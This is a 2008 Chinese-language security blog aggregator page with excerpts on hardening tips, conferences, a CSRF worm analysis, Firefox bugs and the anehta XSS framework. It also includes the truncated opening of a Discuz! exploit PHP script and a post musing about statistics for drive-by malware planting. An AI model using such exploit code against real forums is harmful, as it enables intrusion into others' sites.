http://www.yscx.net/xna/银色巢穴XML聚合器zh-cn2008-11-20 17:22:30SXNA(www.sxna.cn)(www.dc9.cn)Copyright 2005 sxna.cn, All rights reserved.hiheigeWed,19 Nov 2008 23:34:00 +0800http://hi.baidu.com/hi%5Fheige/blog/item/2b90a11dba8a8f8c87d6b6bc.html 这个就是传说中的:不见棺材,不掉泪? 前面我在dz论坛苦苦却说他们早出补丁的..... http://bbs.chinaz.com/Club/thread-1192527-1-1.html http://www.discuz.net/thread-1113736-1-1.html 具体补丁了那些bug 还没时间去看 有兴趣的朋友对比下 告诉我 :) 类别：默认分类 查看评论 80sexWed,19 Nov 2008 22:13:00 +0800http://hi.baidu.com/80sec/blog/item/73168027659e30108b82a14e.html 大家都中奖了，我没中！！暗箱操作啊~ 怨念中。。。 那个谁坐我边上的，中了台PSP3000的不请吃饭就跑了~强烈鄙视中。。。 类别：默认分类 查看评论 tombkeeperWed,19 Nov 2008 20:07:00 +0800http://hi.baidu.com/tombkeeper/blog/item/d48412e9d5120f38b80e2dcb.html 加固保安全，改改更健康： 1、打开secpol.msc，把“网络安全：LAN Manager 身份验证级别”修改为“仅发送 NTLMv2 响应\拒绝 LM 和 NTLM”： 2、打开你的AP的配置界面，修改WPA的加密方式为AES（大多数AP默认都是TKIP）： 阅读全文 类别：技术探索 research 查看评论 baozWed,19 Nov 2008 18:14:00 +0800http://hi.baidu.com/ptmx/blog/item/db04098b54cb9415c8fc7a93.html 裁员数量在7W左右。 大环境不好了，没被裁的同行多多努力，不幸中标的同行也不要放弃。 类别：默认分类 查看评论 ycosxhackWed,19 Nov 2008 17:06:00 +0800http://hi.baidu.com/ycosxhack/blog/item/36569f51806499888d54300a.html CSRF蠕虫顾名思义就是利用CSRF技术进行传播的Web蠕虫，前段时间我的这篇文章《译言CSRF蠕虫分析》说明了CSRF蠕虫存在的事实，译言网站（以下称这样的宿主为victim_site）的这个CSRF蠕虫是由用户驱动的，蠕虫的代码都存放于另外一个网站上（比如worm_site），在victim_site上需要用户驱动的就一个链接http://worm_site/，该链接指向CSRF蠕虫本身。 CSRF蠕虫如何就是一个蠕虫？我们写的代码其实没有表现出一个蠕虫本 阅读全文 类别：Script Attack 查看评论 axisWed,19 Nov 2008 16:08:00 +0800http://hi.baidu.com/aullik5/blog/item/2417d11a5b6f36d2ad6e75c8.html 赶来参加明天举行的xkungfoo。 还是住在去年来参加xcon时候住的同一家酒店。 我沮丧的发现，我忘记带我最喜欢的耳机，忘记带xkungfoo的门票，忘记带名片，还忘记带剃须刀了。 ~~ 类别：乌托邦 查看评论 yunshuWed,19 Nov 2008 14:35:00 +0800http://www.icylife.net/yunshu/show.php?id=644       摘要：前些时候刺写过一个关于当前WEB架构中session和cookie安全问题的文章《Restful风格架构下的一个容易被忽视的安全隐患》，我和他在 公司讨论时提出过解决方案，他在文章也中有提到。在文章后面的评论里，我也有和其它人做过一些探讨。今天闲一点，大致稍微详细一点说说目前流行的这种WEB系统安全架构需 要注意的问题。      前些时候刺写过一个关于当前WEB架构中session和cookie安全问题的文章《Restful风格架构下的一个容易被忽视的安全隐患》，我和他在公司讨论时提出过解决方案，他在文章也中有提到，文章的后面的评论里也有和其它人做过一些探讨。今天闲一点，大致说说目前流行的这种WEB系统安全架构需要注意的问题。       顺便先提一下所谓当前流行的WEB架构。在网络架构方面，目前流行的趋势和以前传统的门户网站采用七层交换，或者四层交换集中式部署做负载均衡不同，比较倾向于在物理位置上做分lisl03Wed,19 Nov 2008 11:26:00 +0800http://hi.baidu.com/lisl03/blog/item/ae85c4c27676a832e5dd3b95.html 比利时小说家Tomislav Dretar提供的一组血淋淋的照片。说的是丹麦属地法罗群岛上的渔民集 阅读全文 类别：其他 查看评论 neeaoWed,19 Nov 2008 10:42:00 +0800http://www.hackeye.com/article/5546/Hack Eye！ ( http://www.hackeye.com/ ) : 2008年10月13日，我在自己的博客提出了“人肉防御”的概念。随后在我的好友和读者圈内引起了一些共鸣和反思。但一直并没有被业界所更明确地关注。之后，大约是在10月底，有几家网络媒体先后转载了我的这篇文章。但基本上也是因“人肉”二字可能吸引眼球而原文转载，并没有深入去谈这个概念，更没有与我联系。 其实，我一直希望能将自己在互联网行业中积累的价值观，至少是一种健康的价值期望与那些不了解这一行业的人们分享：而这些受众，更关注传统媒体：报刊、电视。 前几天，陕西第一大报《华商报》的主持人敬江晴女士与我取得了联系，表达了对“人肉防御”的关注和兴趣，同时也围绕这一概念，对我进行了一次简单的采访。 今天，《华商报》b8版发表了一篇《拥有一颗保护自己和他人的心》的文章，正是敬江晴女士对“人肉防御”概念的通俗化表达。我非常高兴，也非常荣幸能够与报纸媒体一起推行这种对网民有益的概念和意识形态。 全文大家可以在上面给出的链接看到，而neeaoWed,19 Nov 2008 10:32:00 +0800http://www.hackeye.com/article/5545/Hack Eye！ ( http://www.hackeye.com/ ) : 20多年前,曾有人预言生物革命将成为21世纪的时代特征。当时还有观点认为,这一革命对社会伦理的冲击尤其值得关注。现在,克隆生物对社会伦理的冲击波犹在,而伴随着生物学的进步和普及,“生物黑客”也要来了。对 于生物黑客,目前网络媒体和专业论坛对其别称不少:生物崩客,自己动手(DIY)生物学家,车库生物学家……这些名称除了含有像电脑黑客一样的反叛精神 外,还反映出现代生物学一些重要的新特征:即生物科学的神秘性日益被打破,生物科学的普及也日渐广泛。最值得注意的是:生物学及生物工程的成本日益降低, 生物学界的爱因斯坦可能像科幻大片中描述的那样:随时从邻居家的车库里走出来。 7月15日，北 京举行生物恐怖袭击现场处置与医疗救援应急演练，参加演练人员对“重伤员”进行紧急救治。此次演练模拟恐怖分子在某电影院里使用不明物质实 施生物恐怖袭击，市卫生局接警后立即启动处置生物恐怖袭击事件应急预案，参加演练人员完成了事发现场划定和封控、暴露人员疏散、流行neeaoWed,19 Nov 2008 09:02:00 +0800http://www.hackeye.com/article/5544/Hack Eye！ ( http://www.hackeye.com/ ) : 【赛迪网-IT技术报道】U盘 如今可以说非常普及了，不过，如果只是把它用来存储数据的话，也许有点可惜了。其实，我们还可以让U盘发挥更大的能量！今天小编教你一招，能让你的U盘代 替登录系统的密码，只有当你插上U盘才能正常进入系统操作，否则任何操作都无法进入系统。怎么样，是不是很有兴趣一试？ 要想成功实现上述功能，我们需要借助名为Disklogon的小工具，它是一个功 能强大的安全设置工具，可让我们使用优盘、软盘等移动设备来登录系统，可在登录时免于输入用户名和登录密码；而一旦移走了这些设备，系统便可以设置为自动 锁定或关机。下面就来看看如何设置让优盘变成控制登录系统的“密钥盘”。 点击进入Disklogon下载页面 完成软件安装之后按要求重新启动，之后在进入系统的画面中单击“Password”按钮，然后使用键盘输入密码登录（如果之前设置了使用密码登录的话）。但我们是不希望每次都这样繁琐的，下面就来设置一下让优盘发挥更强大的功能，让它直接来控制系统登录。 直接开始baozWed,19 Nov 2008 01:41:00 +0800http://hi.baidu.com/ptmx/blog/item/55031622c9e50ca34623e8a8.html 据说有的挂马的同学已经做了这个事，就是统计一下挂马的网马命中率，到底是通过什么漏洞进入系统挂马的。这样的好处是可以有的放矢，到底挂什么马效率更好，命中率更高，可以用数据更好的指导挂马的方向并引领挂马事业的蓬勃发展。 我坚信术业有专攻，一个卖钢铁的，一般是不能很好的卖豆腐的。只要做细了，挂马同样可以是安全领域里面很专业、很有技术含量、很有前瞻性的一个活。 另外统计一下地理位置也可以为以后的定向投放提供数据支撑。 类别：默认分类 查看评论 sowhatTue,18 Nov 2008 23:45:00 +0800http://hi.baidu.com/secway/blog/item/079034100784e4fbc3ce79dd.html XCon第一天, 一如既往的热闹啊. 比往年更好更强大了,来的四面八方的朋友也更多了. 议题都很牛, 虽然很多听不懂. XCON第一天, 在和ICBM闲聊的时候,竟然发现, 搞漏洞研究的,居然有很多陕西老乡/乡党, 据不完全统计: 褚诚云: http://blog.csdn.net/chengyun_chu/ ICBM: http://hi.baidu.com/icbm 孙冰: 阅读全文 类别：Conference 查看评论 amxkuTue,18 Nov 2008 21:27:00 +0800http://www.amxku.net/Red-shells/ by:amxku.net今天又收到一颗红色炮弹。先恭喜恭喜。 最近受到糖衣炮弹的轰炸，遍体鳞伤。 养伤中…… axisTue,18 Nov 2008 20:09:00 +0800http://hi.baidu.com/aullik5/blog/item/3bd9f40221938ceb08fa934a.html 由于正在开发的版本里做了许多改进，特别是后台UI方面从无到有，做了一次重大的调整，所以下一个发布的anehta版本号将直接定为 0.6.0 目前的开发进度： 改变了slave存储方式，使用xml文件做为数据库存储所有数据。 增加了RSS feed功能，slave信息可以通过rss feed收集了。 后台主要部分已经开发完成了，同时优化和提高了代码效率，firefox下不会再那么消耗内存了。最后发现不是javascript内存泄露，是firefox这个猪头自己频繁的网络请求而不回收内存，老问题了。 anehta.js 阅读全文 类别：象牙塔 查看评论 s4mTue,18 Nov 2008 17:06:00 +0800http://hi.baidu.com/int3/blog/item/59ac5b2ae79d3b3f5243c1a1.html 相比Team509的那个漏洞，IBM ISS-X-Force 报的这个漏洞更加有趣，而且也给出了很多exploit的细节: https://bugzilla.mozilla.org/show_bug.cgi?id=443299 这个漏洞虽然可以往任意内存写4个字节的0xffffffff值，但是利用起来也有一定难度。和Duke的那个flash漏洞有点类似，这个也是因为分配内存后并没有检测内存是否分配成功而引起的。 netwerk\streamconv\converters\nsDirIndexParser.cppline 阅读全文 类别：网络安全 查看评论 s4mTue,18 Nov 2008 16:19:00 +0800http://hi.baidu.com/int3/blog/item/21dff9dd8ce286335882ddce.html 看来注意到的朋友不多啊，我的ff这次又没有自动update，只好手动更新了一下。 https://bugzilla.mozilla.org/show_bug.cgi?id=456896 类别：网络安全 查看评论 neeaoTue,18 Nov 2008 16:10:00 +0800http://www.hackeye.com/article/5543/Hack Eye！ ( http://www.hackeye.com/ ) : #!/usr/bin/php <?php /** * Discuz! 6.x/7.x SODB-2008-13 Exp * By www.80vul.com * 文件中注释的变量值请自行修改 */   $host = 'www.80vul.com'; // 服务器域名或IP $path = '/discuz/'; // 程序所在的路径 $key = 0; // 上面的变量编辑好后，请将此处的值改为1   if (strpos($host, '://') !== false || strpos($path, '/') === false || $key !== 1) exit("专业点好不,先看看里面的注释 -,-\n");   error_reporting(7); ini_set('max_execution_time', 0);   $key = time(); $cmd = 'action=register&usernameneeaoTue,18 Nov 2008 15:28:00 +0800http://www.hackeye.com/article/5542/Hack Eye！ ( http://www.hackeye.com/ ) : 微软周二发布MS08-068安全更新公告,修复了微软服务器信息块(Server Message Block,SMB)协议中的安全漏洞.微软日前就推迟7年才为这个已知的安全漏洞发布补丁做出了解释. 这个安全安全漏洞能够引起SMB中继攻击,让攻击者安装应用程序,查看、修改或者删除数据,或者使用完全的用户权限创建新的账户. 微软安全反应中心的安全程式经理克里斯多佛·巴德(Christopher Budd)周四在博客中称,虽然微软已经知道了这个安全漏洞,但修复这个漏洞将会破坏用户的网络应用程序. 巴德写道,“当这个问题在2001年首次举报时,我们表示不能在对基于网络的应用程序不产生负面影响的情况下进行修复来解决问题.明确地说,这个影响将会让许多(或者几乎全部)用户基于网络的应用程序不能工作.” 巴德解释称,虽然微软在2001年建议用户使用SMB签名,但是,微软当时知道这个缓和办法对某些用户来说也许并不可用. 据Metasploit博客称,微软SMB安全漏洞是一位人称&ldneeaoTue,18 Nov 2008 13:49:00 +0800http://www.hackeye.com/article/5541/Hack Eye！ ( http://www.hackeye.com/ ) : by 云舒 摘要：XML-RSS-1.36是 常用的操作RSS的模块，不过遗憾的是，不支持gb2312，big5等编码的rss文件，操作的话直接报错“Couldn't open encmap gb2312.enc”退出。今天一段代码读baidu的新闻rss 时遇到这个问题，先鄙视一下他用gb2312编码。网上搜索到的解决方案在我这里无效，最终自己比较不优雅的解决了一下。       这个问题发生的原因是XML::RSS模块会调用XML::Parser模块，最终是调用的Perl的核心库Expat，这东西是C写的，不支持gb2312编码。网上搜索到的解决办法如下：       1. Download GB2312.TXT from ftp.unicode.org，事实上这个东西目前下载地址是http://search.cpan.org/src/GUS/Unicode-UTF8